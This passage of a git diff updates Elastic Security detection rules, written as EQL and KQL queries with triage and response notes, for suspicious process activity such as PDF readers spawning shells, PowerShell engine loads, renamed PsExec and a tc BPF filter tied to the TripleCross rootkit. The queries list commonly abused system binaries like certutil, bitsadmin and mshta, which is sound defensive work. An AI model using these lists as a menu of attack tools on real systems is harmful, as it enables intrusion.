@@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious PDF Reader Child Process", - "note": "## Triage and analysis\n\n### Investigating Suspicious PDF Reader Child Process\n\nPDF is a common file type used in corporate environments and most machines have software to handle these files. This\ncreates a vector where attackers can exploit the engines and technology behind this class of software for initial access\nor privilege escalation.\n\nThis rule looks for commonly abused built-in utilities spawned by a PDF reader process, which is likely a malicious behavior.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve PDF documents received and opened by the user that could cause this behavior. Common locations include, but\nare not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full scan using the antimalware tool in place. This scan can reveal additional artifacts left in the system,\npersistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. 
\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious PDF Reader Child Process\n\nPDF is a common file type used in corporate environments and most machines have software to handle these files. This\ncreates a vector where attackers can exploit the engines and technology behind this class of software for initial access\nor privilege escalation.\n\nThis rule looks for commonly abused built-in utilities spawned by a PDF reader process, which is likely a malicious behavior.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve PDF documents received and opened by the user that could cause this behavior. 
Common locations include, but\nare not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full scan using the antimalware tool in place. 
This scan can reveal additional artifacts left in the system,\npersistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : (\"AcroRd32.exe\",\n \"Acrobat.exe\",\n \"FoxitPhantomPDF.exe\",\n \"FoxitReader.exe\") and\n process.name : (\"arp.exe\", \"dsquery.exe\", \"dsget.exe\", \"gpresult.exe\", \"hostname.exe\", \"ipconfig.exe\", \"nbtstat.exe\",\n \"net.exe\", \"net1.exe\", \"netsh.exe\", \"netstat.exe\", \"nltest.exe\", \"ping.exe\", \"qprocess.exe\",\n \"quser.exe\", \"qwinsta.exe\", \"reg.exe\", \"sc.exe\", \"systeminfo.exe\", \"tasklist.exe\", \"tracert.exe\",\n \"whoami.exe\", \"bginfo.exe\", \"cdb.exe\", \"cmstp.exe\", \"csi.exe\", \"dnx.exe\", \"fsi.exe\", \"ieexec.exe\",\n \"iexpress.exe\", \"installutil.exe\", \"Microsoft.Workflow.Compiler.exe\", \"msbuild.exe\", \"mshta.exe\",\n \"msxsl.exe\", \"odbcconf.exe\", \"rcsi.exe\", \"regsvr32.exe\", \"xwizard.exe\", \"atbroker.exe\",\n \"forfiles.exe\", \"schtasks.exe\", \"regasm.exe\", \"regsvcs.exe\", \"cmd.exe\", \"cscript.exe\",\n \"powershell.exe\", \"pwsh.exe\", \"wmic.exe\", \"wscript.exe\", \"bitsadmin.exe\", \"certutil.exe\", \"ftp.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 21, 
"rule_id": "53a26770-9cbd-40c5-8b57-61d01a325e14",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -43,5 +61,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 9
+ "version": 11
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_powershell_imgload.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_powershell_imgload.json
index bda8c28d7e982..4dba7c6590297 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_powershell_imgload.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_powershell_imgload.json
@@ -12,10 +12,43 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious PowerShell Engine ImageLoad", - "note": "## Triage and analysis\n\n### Investigating Suspicious PowerShell Engine ImageLoad\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell without having to execute `PowerShell.exe` directly. This technique, often called\n\"PowerShell without PowerShell,\" works by using the underlying System.Management.Automation namespace and can bypass\napplication allowlisting and PowerShell security features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file\nmodifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n- Retrieve the implementation (DLL, executable, etc.) 
and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity can happen legitimately. Some vendors have their own PowerShell implementations that are shipped with\nsome products. These benign true positives (B-TPs) can be added as exceptions if necessary after analysis.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nAdministrative Templates > \nWindows PowerShell > \nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "library where dll.name : (\"System.Management.Automation.ni.dll\", \"System.Management.Automation.dll\") and\n/* add false positives relevant to your environment here */\nnot process.executable : (\"C:\\\\Windows\\\\System32\\\\RemoteFXvGPUDisablement.exe\", \"C:\\\\Windows\\\\System32\\\\sdiagnhost.exe\") and\nnot process.executable regex~ \"\"\"C:\\\\Program Files( \\(x86\\))?\\\\*\\.exe\"\"\" and\n not process.name :\n (\n \"Altaro.SubAgent.exe\",\n \"AppV_Manage.exe\",\n \"azureadconnect.exe\",\n \"CcmExec.exe\",\n \"configsyncrun.exe\",\n \"choco.exe\",\n \"ctxappvservice.exe\",\n \"DVLS.Console.exe\",\n \"edgetransport.exe\",\n \"exsetup.exe\",\n \"forefrontactivedirectoryconnector.exe\",\n \"InstallUtil.exe\",\n \"JenkinsOnDesktop.exe\",\n 
\"Microsoft.EnterpriseManagement.ServiceManager.UI.Console.exe\",\n \"mmc.exe\",\n \"mscorsvw.exe\",\n \"msexchangedelivery.exe\",\n \"msexchangefrontendtransport.exe\",\n \"msexchangehmworker.exe\",\n \"msexchangesubmission.exe\",\n \"msiexec.exe\",\n \"MsiExec.exe\",\n \"noderunner.exe\",\n \"NServiceBus.Host.exe\",\n \"NServiceBus.Host32.exe\",\n \"NServiceBus.Hosting.Azure.HostProcess.exe\",\n \"OuiGui.WPF.exe\",\n \"powershell.exe\",\n \"powershell_ise.exe\",\n \"pwsh.exe\",\n \"SCCMCliCtrWPF.exe\",\n \"ScriptEditor.exe\",\n \"ScriptRunner.exe\",\n \"sdiagnhost.exe\",\n \"servermanager.exe\",\n \"setup100.exe\",\n \"ServiceHub.VSDetouredHost.exe\",\n \"SPCAF.Client.exe\",\n \"SPCAF.SettingsEditor.exe\",\n \"SQLPS.exe\",\n \"telemetryservice.exe\",\n \"UMWorkerProcess.exe\",\n \"w3wp.exe\",\n \"wsmprovhost.exe\"\n )\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious PowerShell Engine ImageLoad\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell without having to execute `PowerShell.exe` directly. This technique, often called\n\"PowerShell without PowerShell,\" works by using the underlying System.Management.Automation namespace and can bypass\napplication allowlisting and PowerShell security features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file\nmodifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n- Retrieve the implementation (DLL, executable, etc.) and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity can happen legitimately. Some vendors have their own PowerShell implementations that are shipped with\nsome products. 
These benign true positives (B-TPs) can be added as exceptions if necessary after analysis.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "query": "any where (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (dll.name : (\"System.Management.Automation.ni.dll\", \"System.Management.Automation.dll\") or\n file.name : (\"System.Management.Automation.ni.dll\", \"System.Management.Automation.dll\")) and\n\n/* add false positives relevant to your environment here */\nnot process.executable : (\"C:\\\\Windows\\\\System32\\\\RemoteFXvGPUDisablement.exe\", \"C:\\\\Windows\\\\System32\\\\sdiagnhost.exe\") and\nnot process.executable regex~ \"\"\"C:\\\\Program Files( \\(x86\\))?\\\\*\\.exe\"\"\" and\n not process.name :\n (\n \"Altaro.SubAgent.exe\",\n \"AppV_Manage.exe\",\n \"azureadconnect.exe\",\n \"CcmExec.exe\",\n \"configsyncrun.exe\",\n \"choco.exe\",\n \"ctxappvservice.exe\",\n \"DVLS.Console.exe\",\n \"edgetransport.exe\",\n \"exsetup.exe\",\n \"forefrontactivedirectoryconnector.exe\",\n \"InstallUtil.exe\",\n \"JenkinsOnDesktop.exe\",\n \"Microsoft.EnterpriseManagement.ServiceManager.UI.Console.exe\",\n \"mmc.exe\",\n \"mscorsvw.exe\",\n \"msexchangedelivery.exe\",\n \"msexchangefrontendtransport.exe\",\n \"msexchangehmworker.exe\",\n \"msexchangesubmission.exe\",\n \"msiexec.exe\",\n \"MsiExec.exe\",\n \"noderunner.exe\",\n \"NServiceBus.Host.exe\",\n 
\"NServiceBus.Host32.exe\",\n \"NServiceBus.Hosting.Azure.HostProcess.exe\",\n \"OuiGui.WPF.exe\",\n \"powershell.exe\",\n \"powershell_ise.exe\",\n \"pwsh.exe\",\n \"SCCMCliCtrWPF.exe\",\n \"ScriptEditor.exe\",\n \"ScriptRunner.exe\",\n \"sdiagnhost.exe\",\n \"servermanager.exe\",\n \"setup100.exe\",\n \"ServiceHub.VSDetouredHost.exe\",\n \"SPCAF.Client.exe\",\n \"SPCAF.SettingsEditor.exe\",\n \"SQLPS.exe\",\n \"telemetryservice.exe\",\n \"UMWorkerProcess.exe\",\n \"w3wp.exe\",\n \"wsmprovhost.exe\"\n )\n", + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "852c1f19-68e8-43a6-9dce-340771fe1be3", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +83,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_psexesvc.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_psexesvc.json index e9c10e387e6ea..4aed3f8438ada 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_psexesvc.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_psexesvc.json
@@ -12,10 +12,28 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Suspicious Process Execution via Renamed PsExec Executable",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
+ "note": "",
 "query": "process where event.type in (\"start\", \"process_started\", \"info\") and\n process.pe.original_file_name : \"psexesvc.exe\" and not process.name : \"PSEXESVC.exe\"\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.pe.original_file_name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "e2f9fdf5-8076-45ad-9427-41e0e03dc9c2",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -50,5 +68,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 5
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_short_program_name.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_short_program_name.json
deleted file mode 100644
index e1e3ecefd2bc8..0000000000000
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_suspicious_short_program_name.json
+++ /dev/null
@@ -1,30 +0,0 @@
-{
- "author": [
- "Elastic"
- ],
- "description": "Identifies process execution with a single character process name. This is often done by adversaries while staging or executing temporary utilities.",
- "from": "now-9m",
- "index": [
- "winlogbeat-*",
- "logs-endpoint.events.*",
- "logs-windows.*"
- ],
- "language": "eql",
- "license": "Elastic License v2",
- "name": "Suspicious Execution - Short Program Name",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
- "query": "process where event.type in (\"start\", \"process_started\") and length(process.name) > 0 and\n length(process.name) == 5 and host.os.name == \"Windows\" and length(process.pe.original_file_name) > 5\n",
- "risk_score": 47,
- "rule_id": "17c7f6a5-5bc9-4e1f-92bf-13632d24384d",
- "severity": "medium",
- "tags": [
- "Elastic",
- "Host",
- "Windows",
- "Threat Detection",
- "Execution"
- ],
- "timestamp_override": "event.ingested",
- "type": "eql",
- "version": 4
-}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_tc_bpf_filter.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_tc_bpf_filter.json
new file mode 100644
index 0000000000000..ba7f8ca63340d
--- /dev/null
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_tc_bpf_filter.json
@@ -0,0 +1,78 @@
+{
+ "author": [
+ "Elastic"
+ ],
+ "description": "Detects when the tc (transmission control) binary is utilized to set a BPF (Berkeley Packet Filter) on a network interface. Tc is used to configure Traffic Control in the Linux kernel. It can shape, schedule, police and drop traffic. A threat actor can utilize tc to set a bpf filter on an interface for the purpose of manipulating the incoming traffic. This technique is not at all common and should indicate abnormal, suspicious or malicious activity.",
+ "from": "now-9m",
+ "index": [
+ "logs-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "BPF filter applied using TC",
+ "query": "process where event.type != \"end\" and process.executable : \"/usr/sbin/tc\" and process.args : \"filter\" and process.args : \"add\" and process.args : \"bpf\" and not process.parent.executable: \"/usr/sbin/libvirtd\"\n",
+ "references": [
+ "https://github.com/h3xduck/TripleCross/blob/master/src/helpers/deployer.sh",
+ "https://man7.org/linux/man-pages/man8/tc.8.html"
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.executable",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.executable",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 73,
+ "rule_id": "ef04a476-07ec-48fc-8f3d-5e1742de76d3",
+ "severity": "high",
+ "tags": [
+ "Elastic",
+ "Host",
+ "Linux",
+ "Threat Detection",
+ "Execution",
+ "TripleCross"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0002",
+ "name": "Execution",
+ "reference": "https://attack.mitre.org/tactics/TA0002/"
+ },
+ "technique": [
+ {
+ "id": "T1059",
+ "name": "Command and Scripting Interpreter",
+ "reference": "https://attack.mitre.org/techniques/T1059/",
+ "subtechnique": [
+ {
+ "id": "T1059.004",
+ "name": "Unix Shell",
+ "reference": "https://attack.mitre.org/techniques/T1059/004/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 2
+}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_user_exec_to_pod.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_user_exec_to_pod.json
index 72c4a8399a0de..10e988a018e04 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_user_exec_to_pod.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_user_exec_to_pod.json
@@ -12,14 +12,27 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Kubernetes User Exec into Pod",
- "note": "## Config\n\nThe Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.",
- "query": "event.dataset:\"kubernetes.audit_logs\" \n and kubernetes.audit.objectRef.resource:\"pods\" \n and kubernetes.audit.objectRef.subresource:\"exec\"\n",
+ "note": "",
+ "query": "kubernetes.audit.objectRef.resource:\"pods\" \n and kubernetes.audit.objectRef.subresource:\"exec\"\n",
 "references": [
 "https://kubernetes.io/docs/tasks/debug/debug-application/debug-running-pod/",
 "https://kubernetes.io/docs/tasks/debug/debug-application/get-shell-running-container/"
 ],
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.objectRef.resource",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.objectRef.subresource",
+ "type": "unknown"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "14de811c-d60f-11ec-9fd7-f661ea17fbce",
+ "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -46,5 +59,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 1
+ "version": 3
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_via_compiled_html_file.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_via_compiled_html_file.json
index 4aa2adb6b2dd0..76c2d8b5d86d5 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_via_compiled_html_file.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_via_compiled_html_file.json
@@ -15,10 +15,28 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Process Activity via Compiled HTML File",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
- "query": "process where event.type in (\"start\", \"process_started\") and \n process.parent.name : \"hh.exe\" and \n process.name : (\"mshta.exe\", \"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"cscript.exe\", \"wscript.exe\")\n",
+ "note": "",
+ "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"hh.exe\" and\n process.name : (\"mshta.exe\", \"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"cscript.exe\", \"wscript.exe\")\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "e3343ab9-4245-4715-b344-e11c56b0a47f",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -60,7 +78,7 @@
 "technique": [
 {
 "id": "T1218",
- "name": "Signed Binary Proxy Execution",
+ "name": "System Binary Proxy Execution",
 "reference": "https://attack.mitre.org/techniques/T1218/",
 "subtechnique": [
 {
@@ -75,5 +93,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 11
+ "version": 13
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_via_hidden_shell_conhost.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_via_hidden_shell_conhost.json
index 3614ec7bcaf72..945188d9d6c43 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_via_hidden_shell_conhost.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_via_hidden_shell_conhost.json
@@ -12,13 +12,31 @@ "language": "eql", "license": "Elastic License v2", "name": "Conhost Spawned By Suspicious Parent Process", - "note": "## Triage and analysis\n\n### Investigating Conhost Spawned By Suspicious Parent Process\n\nThe Windows Console Host, or `conhost.exe`, is both the server application for all of the Windows Console APIs as well as\nthe classic Windows user interface for working with command-line applications.\n\nAttackers often rely on custom shell implementations to avoid using built-in command interpreters like `cmd.exe` and \n`PowerShell.exe` and bypass application allowlisting and security features. Attackers commonly inject these implementations into\nlegitimate system processes.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file\nmodifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n- Retrieve the parent process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following 